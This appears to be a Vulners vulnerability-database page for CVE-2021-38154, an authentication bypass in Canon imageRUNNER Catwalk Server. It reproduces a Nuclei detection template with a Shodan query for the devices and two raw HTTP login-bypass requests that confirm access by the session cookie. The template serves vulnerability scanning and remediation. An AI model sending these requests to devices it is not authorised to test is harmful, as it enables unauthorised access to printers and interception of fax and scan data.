| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2021-38154 | 29 Aug 202105:15 | – | attackerkb | |
| CVE-2021-38154 | 10 Oct 202510:51 | – | circl | |
| Canon 多款产品信息泄露漏洞 | 29 Aug 202100:00 | – | cnnvd | |
| CVE-2021-38154 | 29 Aug 202104:59 | – | cve | |
| CVE-2021-38154 | 29 Aug 202104:59 | – | cvelist | |
| EUVD-2021-24625 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-38154 | 29 Aug 202105:15 | – | nvd | |
| Code injection | 29 Aug 202105:15 | – | prion | |
| PT-2021-21971 | 29 Aug 202100:00 | – | ptsecurity | |
| CVE-2021-38154 | 22 May 202520:08 | – | redhatcve |
id: CVE-2021-38154
info:
name: Canon Devices - Authentication Bypass in Catwalk Server
author: daffainfo
severity: high
description: |
Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.
impact: |
Unauthenticated attackers can modify email settings and redirect FAX and scan data to attacker-controlled email addresses when PIN protection is disabled, potentially intercepting sensitive business communications.
remediation: |
Configure a PIN for General User Mode or apply Canon firmware updates that address this vulnerability.
reference:
- https://protocolpolice.nl/CVE-2021-38154_Protocol_Police_Catwalk_Alert
- https://www.usa.canon.com/internet/portal/us/home/support/product-advisories
- https://nvd.nist.gov/vuln/detail/CVE-2021-38154
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-38154
cwe-id: CWE-732
epss-score: 0.04
epss-percentile: 0.89292
cpe: cpe:2.3:h:canon:-:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: canon
shodan-query: title:"imageRUNNER"
tags: cve,cve2021,canon,auth-bypass,vkev,vuln
flow: http(1) || http(2)
http:
- raw:
- |
POST /tryLogin.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginM=&0000=0011&0002=
matchers:
- type: dsl
dsl:
- 'status_code == 303'
- 'contains(location, "/portal_top.html")'
- 'contains(set_cookie, "fusion-http-session-id=")'
condition: and
- raw:
- |
POST /checkLogin.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
i0017=2&i0019=
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(location, "/portal_top.html")'
- 'contains(set_cookie, "sessid=")'
condition: and
# digest: 490a0046304402205077e4af33a38de8a5049b2990708728cbd6097ccd838c9a787453a79bce53700220608cf4612ec4f6a41ce18848bc71955d4765ad2d6b1c2aecc7de373e940ef158:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation